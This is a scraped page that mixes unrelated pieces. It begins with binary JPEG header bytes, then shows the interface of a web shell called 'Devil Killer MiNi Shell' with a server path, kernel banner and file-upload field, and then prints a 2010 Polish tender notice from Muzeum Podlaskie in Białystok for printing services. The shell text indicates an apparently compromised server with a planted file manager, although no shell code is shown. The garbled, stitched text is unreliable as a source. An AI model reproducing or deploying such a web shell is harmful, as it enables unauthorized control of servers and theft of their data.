JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/381048-N-2010.html

<p class="kh_header"><b>Białystok: Usługa poligraficzna: projekt, skład i druk albumów, katalogów, plakatów, folderów, wydawnictw książkowych, ulotek informacyjnych, pocztówek, druków reklamowych, materiałów do aranżacji wystaw, biletów wstępu i zaproszeń na  wystawy dla Muzeum Podlaskiego w Białymstoku na 2011 rok.</b><br>
<b>Numer ogłoszenia: 381048 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa wojewódzka jednostka kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa poligraficzna: projekt, skład i druk albumów, katalogów, plakatów, folderów, wydawnictw książkowych, ulotek informacyjnych, pocztówek, druków reklamowych, materiałów do aranżacji wystaw, biletów wstępu i zaproszeń na  wystawy dla Muzeum Podlaskiego w Białymstoku na 2011 rok..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa poligraficzna: projekt,  skład i druk katalogów, folderów, plakatów,  wydawnictw książkowych, zeszytów edukacyjnych, ulotek informacyjnych, pocztówek, druków reklamowych,  materiałów do aranżacji wystaw, biletów wstępu i zaproszeń na  wystawy dla Muzeum Podlaskiego w Białymstoku na  2011 rok. 
2.	Szczegółowy opis przedmiotu zamówienia:

Część I zamówienia 
Usługa poligraficzna polega na przygotowaniu projektu , opracowaniu zdjęć, sporządzenie składu, przygotowanie do druku i druk albumów fotograficznych i z reprodukcjami dzieł sztuki na 2011 rok 
Albumy
     1. album - format 270 x 300 cm, obj. 60 str., kreda mat. 150g, kolor 4+4, oprawa miękka, klejona, karton 240g z białym spodem, kolor 4+0+folia matowa,.
         wydawnictwo posiada Nr ISBN  - - nakład 500 egz Zamawiający dostarcza projekt
     2. album - fotograficzny o Muzeum, format 270 x 300 cm, obj. 60 str., kreda mat. 150g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130g, kolor 4+0+folia matowa, wyklejka niezadrukowana, 
         wydawnictwo posiada Nr ISBN - nakład 2000 egz.  

Część II zamówienia. 
Usługa poligraficzna  polega na przygotowaniu  projektu, opracowaniu zdjęć,  sporządzeniu składu, przygotowanie do druku i druku materiałów tzn.: książek, katalogów / informatorów, zeszytów edukacyjnych na 2011 rok 
Książki
1. książka, format A4, objętość ok. 500 stron: tekst, ryciny - kolor 1+1, papier offset 90g, oprawa twarda, szyta,   oklejka 130g, kolor 4+0+folia błyszcząca, wyklejka zadrukowana, kolor 1+0, nakład 500 egz. 
wydawnictwo posiada Nr ISBN
2. książka, format B5, 64 str., kreda mat. 130g,  kolor 4+4, oprawa miękka, klejona, okładka (rozkładane   pierwsze skrzydełko na szerokość całej strony) - karton  240 g, kolor 4+4+ folia błyszcząca, nakład 500 egz. 
wydawnictwo posiada Nr ISBN
3.  książka, format B5, środek obj. 170 str.: w tym 120 stron papier offset 90g, kolor 1+1, 50 stron  kreda mat.  130 g, kolor 4+4, okładka  karton 240 g, kolor 4+0+ folia błyszcząca, oprawa miękka klejona, nakład 500 egz. wydawnictwo posiada Nr ISBN
4. książka, format 1/3 B4, 40 stron,  kreda mat. 150 g,  kolor 4+4, okładka (ostatnia strona ze skrzydełkiem rozkładanym na szerokość strony),  kreda mat 300g + folia mat, kolor 4+4, oprawa klejona,  nakład 2000 szt. wydawnictwo posiada Nr ISBN
Katalogi/informatory
     1.  informator oferty edukacyjnej, format A5 poziom (148 x 210mm), środek 16 stron, kreda mat. 130 g, kolor 4+4, okładka kreda mat. 300g, kolor 4+1+lakier offsetowy, szycie zeszytowe, nakład 2000 szt.   
     2. śpiewnik piosenek niepodległościowych, format A5 poziom (148 x 210mm), środek 12 stron, papier offset 90g, kolor 4+4, okładka kreda mat. 300g, kolor 4+1+lakier offsetowy, szycie zeszytowe, nakład 200 szt.   
3. informator, format B5, środek: obj. 20 str.,  kreda  mat. 130g, kolor 4+4, okładka - karton 200g, kolor 4+0+  folia błyszcząca, szycie zeszytowe, nakład 500 szt.  wydawnictwo posiada Nr ISBN
4. informator, format B5, środek obj. 16 str., kreda mat. 130 g, kolor 1+1, okładka - kreda mat. 300 g, kolor   4+1+lakier offsetowy, szycie zeszytowe, nakład 300 egz.  wydawnictwo posiada Nr ISBN
5. informator, format A4, środek: obj. 12 str., kreda mat. 150 g, kolor 4+4, okładka - kreda mat. 300 g,  kolor 4+0+lakier offsetowy, szycie zeszytowe, nakład 500 egz. wydawnictwo posiada Nr ISBN
6. informator, format A4, środek: obj. 24 str., kreda mat. 150 g, kolor 4+4, okładka - kreda mat. 300 g, kolor 4+0+lakier offsetowy, szycie zeszytowe, nakład 1000 egz.  wydawnictwo posiada Nr ISBN
7.informator, format A4, środek 24 strony, kreda mat. 130g, kolor 4+4, okładka karton 200g, kolor 4+0+lakier offsetowy, szycie zeszytowe, na okładce wklejona kieszeń na płytę CD, nakład 500 szt. 
wydawnictwo posiada Nr ISBN- Zamawiający dostarcza projekt 
8.reprint Gazety Białostockiej, 4 karty formatu 22,70 x 58,60 cm składane na dwa, papier offsetowy   (gazetowy), kolor 1+1, 5 gazet w nakładzie 10 egz. każda   
9. reprint Tygodnika Mód i Powieści, 2 karty formatu 28 x 77,40 cm składane na dwa, papier offsetowy (gazetowy), kolor 1+1, 5 gazet w nakładzie 10 egz. każda   
 Zeszyty edukacyjne
1. zeszyt edukacyjny, format A4, 16 stron, papier offset 90g, kolor 1+1, okładka, karton 200g, kolor 4+0+lakier offsetowy, nakład 500 szt. - Zamawiający dostarcza projekt
2. Zeszyt edukacyjny, format A4, 16 stron, papier offset 90g, kolor 4+4, wkładka wszyta w środek: 2xA4, papier offset 120g, kolor sepia+sepia, okładka: karton 200g, kolor sepia+0+lakier offsetowy, szycie zeszytowe, nakład 1000 egz.  
3. zeszyt edukacyjny, format A4, 20 stron, papier offset 120g, kolor 4+4,okładka karton 200 g., kolor 4+0+lakier offsetowy, nakład 1000 egz.
 4. zeszyt edukacyjny, format A4, środek - 24 strony, papier offset 90g, kolor 4+4, wkładka formatu A4 - wydruk na folii samoprzylepnej kolor 4+0, okładka karton 200 g, kolor 4+0 +lakier offsetowy, nakład 1000 szt. - Zamawiający dostarcza projekt
5. zeszyt edukacyjny, format A4, 16 stron, papier offset 90 g, kolor 4+4, wszywka w środek - 4 strony A4 (jedna strona perforowana do oderwania), offset 120g, kolor 4+1; wkładka 2 kartki A4 - druk na folii samoprzylepnej, kolor 4+0; okładka - karton 200 g, kolor 4+0+lakier offsetowy, nakład 1000 egz.  Zamawiający dostarcza projekt
6. zeszyt edukacyjny, format A4, 16 stron, papier offset 90 g, kolor 4+4, wszywka 4 strony formatu  A4, offset 120g, kolor 4+0,  okładka karton 200 g, kolor 4+0+lakier offsetowy, nakład 1000 egz. Zamawiający dostarcza projekt  
7. teczka z kompletem 16 kartek: teczka format A4 (2xA4+na spodniej części skrzydełka od dołu i z boku, z nacięciem pozwalającym na ich połączenie; podwójne bigowania na zgięciach), karton 270 g + folia błyszcząca, kolor 4+0; środek: 16 kart formatu A4, papier offset 180g, 8 kart - kolor 1+1, 8 kart - kolor 4+4, nakład 1000 kompletów   

Część III zamówienia. 
Usługa poligraficzna polega na przygotowaniu projektu, opracowaniu zdjęć, sporządzeniu składu, przygotowanie do druku i druku folderów/składanek, zaproszeń, pocztówek, zakładek wizytówek i ulotek na 2011 rok
Foldery/składanki
1.	folder, format B4 składane na trzy (dwa bigi), kreda mat. 200g, kolor 4+4+lakier offsetowy, 1000 szt.  
2.	format A4 (składany na 3), 2 bigowania, kreda mat. 200 g, kolor 4+4+lakier offsetowy, wszywka w jedno bigowanie - 8 stron formatu 1/3 A4, papier offset 80g, kolor 1+1, nakład 600 egz.
3.	folder, format A4 (składany na 3), 2 bigi, kreda mat. 150 g, kolor 4+4, nakład 3000 szt. (1000 - wersja polska, 1000 - wersja angielska, 1000 - wersja niemiecka)  
4.	folder, format A3 (składany na 3) dwa bigi, kreda mat. 200 g, kolor 4+4+lakier offsetowy, nakład 3 x 400 szt.   
5.	folder, format A3 składane na 3, 2 bigi, kreda mat.  200 g, kolor 4+4+lakier offsetowy, wkładka wpięta w bigowanie: 4 str. format 1/3 A3, kreda mat. 200 g, kolor 4+4, nakład 5000 egz.
6.	folder, format A3 (składany na 3) dwa bigi, kreda mat. 200 g, kolor 4+4+lakier offsetowy, nakład 2 x 2000 szt. (w każdym nakładzie 1000 szt. wersja polska, 500 szt. ang., 500 szt. niem.)
7.	folder, format 29,6 x 58,6 cm (składany na 4), 3 bigowania, kreda mat. 200 g, kolor 4 + 4+lakier offsetowy, nakład 1000 egz.   
8.	folder, format ? A3 (105mm x 420mm) składany na 4 do formatu A6 - 2 bigi + 1 perforowanie, kreda mat. 300g, kolor 4+4+lakier offsetowy, nakład 1000 szt. Zamawiający dostarcza projekt 
9.	folder format 400x210 mm, składane na cztery (3 bigi), kreda mat. 250 g, kolor 4+4+lakier offsetowy, nakład 3000 szt.
10.	folder format 400x210 mm, składane na cztery (3 bigi), kreda mat. 150 g, kolor 4+4, nakład 3000 szt.  
 Zaproszenia
1. zaproszenie, format A5 składane do A6 (pion), kreda mat. 250 g, kolor 4+1, nakład 3 x 200 szt
2. zaproszenie, format A5, kreda mat 300 g, kolor 2+2+lakier offsetowy, nakład 300 szt.
3. zaproszenie, format A4 (składane na dwa), 1 bigowanie, kreda mat. 250 g, kolor 4+4, nakład 2 x 1000 szt.  
4. zaproszenie, format A4 składane na 3, 2 bigi, kreda mat. 200g, kolor 4+0, nakład 8000 szt. (w tym: 1 wzór - 1000 szt. 1 wzór - 2000 szt. 1 wzór - 5000 szt.) Zamawiający dostarcza projekt
5. zaproszenie, format A4 (składane na dwa), 1 bigowanie, kreda mat. 250 g, kolor 1+1, nakład 500 szt.   
Pocztówki/reprodukcje.
1. pocztówka, format A6, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 2 x 1000 szt.
2. pocztówka, format A6,  kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 1000 szt. Zamawiający dostarcza projekt 
3. pocztówka, format A6, kreda 300 g + lakier UV, kolor 4+1,  nakład 4 x 1000 szt.  
4. składanka pocztówek w obwolucie: 9 pocztówek, format A6, kreda  mat. 300g, kolor sepia+1+lakier offsetowy, obwoluta - format (3xA6 składana na trzy), 4 bigowania, kreda mat. 240g, kolor sepia+1+lakier offsetowy, nakład 1000 kompletów   
5. pocztówka, format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 2000 szt. (w tym 4 wzory po 500 szt.)  
6. pocztówka format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 2x500 szt. (w każdym z 2 nakładów - dwa rodzaje tekstów - na 200 szt. inny i na 300 szt. inny)
7. komplet pocztówek w obwolucie, 6 pocztówek - format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, obwoluta - format 3xA5, 4 bigi, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 1000 kompletów 
8. pocztówka format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 2x500 szt.
9. składanka pocztówek w obwolucie: 8 pocztówek, format A5, kreda mat. 300g+lakier offsetowy, kolor 4+1, obwoluta - format (3xA5 składana na trzy), 4 bigowania, kreda mat. 300g+lakier offsetowy, kolor 4+1, nakład 1000 kompletów   
10. składanka pocztówek w obwolucie: 8 pocztówek, format A6, kreda mat. 300g+lakier offsetowy, kolor 4+1, obwoluta - format (3xA6 składana na trzy), 4 bigowania, kreda mat. 300g+lakier offsetowy, kolor 4+1, nakład 1000 kompletów
11. komplet: 8 pocztówek formatu 1/3 A4, kreda mat. 300g, kolor 4+1+lakier offsetowy; obwoluta A4  składane na 3, 4 bigi, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 1000 kompletów
Ulotki
1. ulotka, format A5, kreda 135g, kolor 4+0, nakład 3 x 300 szt
2. ulotka, format A5, kreda 150g, kolor 4+4, nakład 2000 szt. (w tym 1000 szt. wersja polskojęzyczna 
   i 1000 szt. wersja angielskojęzyczna) 
3. ulotka, format A5, kreda 150 g, kolor 4+4, nakład 3 x 300 szt.   
Zakładki
1. zakładka, format 6 cm x 20 cm, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 500 szt 
2. zakładka, format 6 cm x 20 cm, kreda mat. 300 g, kolor 4+4+lakier offsetowy, nakład 1000 szt
3. zakładka, format 6 cm x 20 cm, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 1000 szt.
Wizytówki
1. wizytówka, 5x9 cm, papier ecrue 250g, kolor 2+0, nakład 500 szt. Zamawiający dostarcza projekt  
2. wizytówka, 5x9 cm, papier ecrue 250g, kolor 2+0, nakład 500 szt. Zamawiający dostarcza projekt  
Część IV zamówienia .
Usługa poligraficzna obejmuje projekt, opracowanie zdjęć, sporządzenie składu, przygotowanie do druku i druku plakatów/afiszy materiałów do aranżacji wystaw ,   druk biletów wstępu , kalendarza naściennego, teczek kartonowych, kopert ulotek do płyt CD na 2011 rok 
Plakaty/afisze.
1. afisz, format A1, papier offset, kolor 2+0, nakład 2 X 200 szt.
2. afisz, format A2, papier offset, kolor 2+0, nakład 2 x 200 szt
3. plakat, format A3, kreda 140 g, kolor 4+0, nakład: 3 x 150 szt.   
4. plakat, format A3, kreda 150 g, kolor 4+0, nakład 2 x 500 szt
5. plakat, format A3 (poziom), kreda 150 g, kolor 4+0, nakład 3 x 50 szt
6. plakat, format A3 (poziom), kreda 150 g, kolor sepia+0, nakład 1000 szt.   
7. plakat, format 100 cm x 50 cm, kreda 250g, kolor 4+0, 20 wzorów każdy w jednym wydruku  
8. plakat, format 70 cm x 100 cm, kreda 150g, kolor 4+0, nakład 2000 szt. (w tym 4 wzory po 500 szt.)  
Kalendarze
1. kalendarz naścienny w formie jednej karty formatu 100x70 (pion), kreda 200 g, kolor 4+0, nakład 500 szt.   oblistwowanie metalowe z zawieszką  
Materiały do aranżacji wystaw
1. druk na winilu 300 m2
2. druk na siatce 100 m2
3. druk na papierze blueback 300 m 2
4. druk na folii samoprzylepnej podklejanej na spienione PCV 5 mmm 90 m2
5. druk na folii samoprzylepnej podklejanej obustronnie na spienione PCV 5 mm 50 m2




 Bilety wstępu
1. bilety wstępu: format 4 x14 cm, papier 80g kolor 1(pantone) +1(czarny), klejone w bloczkach po 100 szt. (wg załączonego wzoru),  projekt dostarczamy nakład 50.000 szt.
 Inne
1. teczka format A4 (2xA4+na spodniej części skrzydełka od dołu i z boku, z nacięciem pozwalającym na ich połączenie; podwójne bigowania na zgięciach), karton 270 g + folia błyszcząca, kolor 4+0, nakład 500 szt.  
2. koperta na CD, 125x125 mm, kreda mat. 200 g, kolor 4+0+lakier offsetowy, nakład 500 szt.  
3. koperta na CD, 125x125 mm, kreda mat. 200 g, kolor 4+0+lakier offsetowy, nakład 1000 szt.
4. wkładka - ulotka do plastikowego opakowania na CD, kreda 130g, przód: 122x120 mm, tył: 140x120 mm, kolor 4+1, 2 bigowania, nakład 1000 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje  udzielenie zamówień uzupełniających art.67 ust.1 pkt.6  ustawy Prawo Zamówień publicznych  - dotyczy materiałów do aranżacji wystaw wymienionych w części IV zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 78.22.00.00-5, 78.20.00.00-9, 78.22.50.00-0, 78.21.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metoda spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie uznany za spełniony jeżeli Wykonawca przedstawi wykaz co najmniej 3 zamówień - każde odpowiadające swoim rodzajem i wartością przedmiotowi niniejszego zamówienia, zrealizowanych przez Wykonawcę w ciągu ostatnich 3 lat poprzedzających termin otwarcia ofert, z podaniem ich wartości nie mniejszej niż wartość zamówienia oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że zamówienia  te zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten uznany za spełniony jeżeli Wykonawca biedzie dysponować drukarnią usytuowaną w odległości nie większej niż 100 km od siedziby Zamawiającego (jest to uwarunkowane względami organizacyjnymi Zamawiającego i finansowymi ) albo powinien przedstawić pisemne zobowiązanie innego podmiotu do udostępnienia Wykonawcy drukarni usytuowanej w odległości nie większej niż 100 km od siedziby Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca będzie dysponował co najmniej jedną osobą posiadającą co najmniej 3 letnie doświadczenie w zakresie druku wydawnictw z reprodukcjami muzealnictwa, historii, historii sztuki, archeologii, etnografii lub przedstawi pisemne zobowiązanie innego podmiotu do udostępnienia co najmniej jednej osoby o takim doświadczeniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca przedstawi aktualną polisę a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż  wartość zamówienia .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
